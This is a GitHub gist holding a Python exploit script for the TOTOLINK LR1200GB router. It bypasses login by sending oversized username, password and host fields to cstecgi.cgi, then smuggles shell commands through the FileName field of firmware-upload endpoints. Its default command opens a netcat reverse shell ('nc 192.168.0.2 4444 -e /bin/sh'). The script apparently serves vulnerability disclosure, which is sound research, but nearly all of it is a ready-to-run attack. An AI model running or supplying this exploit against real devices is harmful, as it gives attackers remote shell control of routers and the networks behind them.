Created
February 14, 2024 03:16
-
-
Save manishkumarr1017/30bca574e2f0a6d6336115ba71111984 to your computer and use it in GitHub Desktop.
TOTOLINK LR1200GB Authentication Bypass and RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import json | |
import argparse | |
import sys | |
import requests | |
from colorama import Fore, Style | |
URL = "http://192.168.0.1/cgi-bin/cstecgi.cgi" | |
def login_bypass(): | |
login_bypass_payload = { | |
"username": username, | |
"password": password, | |
"http_host": host, | |
"verify": 0, | |
"flag": 0, | |
"topicurl": "loginAuth", | |
} | |
response = requests.post(URL, json=login_bypass_payload, timeout=1) | |
try: | |
token = json.loads(response.text).get("token") | |
if token: | |
print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Token: {token}") | |
return token | |
else: | |
print( | |
f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to get the token" | |
) | |
sys.exit(0) | |
except json.JSONDecodeError as e: | |
print( | |
f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to decode the json" | |
) | |
sys.exit(0) | |
def upload_firmware_file_rce(): | |
print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Executing command: {cmd}") | |
filename = "File File;" + cmd + "; ls -al >" | |
payload = { | |
"FileName": filename, | |
"FullName": "File", | |
"ContentLength": "10000", | |
"topicurl": "UploadFirmwareFile", | |
"token": login_bypass(), | |
} | |
requests.post(URL, json=payload, timeout=1) | |
def set_upload_setting_rce(): | |
print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Executing command: {cmd}") | |
filename = "File File;" + cmd + "; ls -al >" | |
payload = { | |
"FileName": filename, | |
"FullName": "File", | |
"ContentLength": "10000", | |
"topicurl": "setUploadSetting", | |
"token": login_bypass(), | |
} | |
requests.post(URL, json=payload, timeout=1) | |
def main(): | |
parser = argparse.ArgumentParser( | |
description="Command-line tool for a hypothetical application." | |
) | |
parser.add_argument( | |
"-u", "--username", type=str, help="Username for authentication", required=False | |
) | |
parser.add_argument( | |
"-p", "--password", type=str, help="Password for authentication", required=False | |
) | |
parser.add_argument( | |
"-e", | |
"--exploit", | |
type=str, | |
help="arguments can be login_bypass, set_upload_setting_rce, upload_firmware_file_rce", | |
required=True, | |
) | |
parser.add_argument("-t", "--host", type=str, help="Host address", required=False) | |
parser.add_argument( | |
"-c", "--cmd", type=str, help="Command to execute", required=False | |
) | |
args = parser.parse_args() | |
global username, password, host, cmd | |
username = args.username if args.username else "A" * 50 | |
password = args.password if args.password else "A" * 12 | |
host = args.host if args.host else "A" * 304 | |
cmd = args.cmd if args.cmd else "nc 192.168.0.2 4444 -e /bin/sh" | |
exploit = globals().get(args.exploit) | |
if exploit and callable(exploit): | |
exploit() | |
else: | |
print( | |
f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Given exploit doesn't exist" | |
) | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment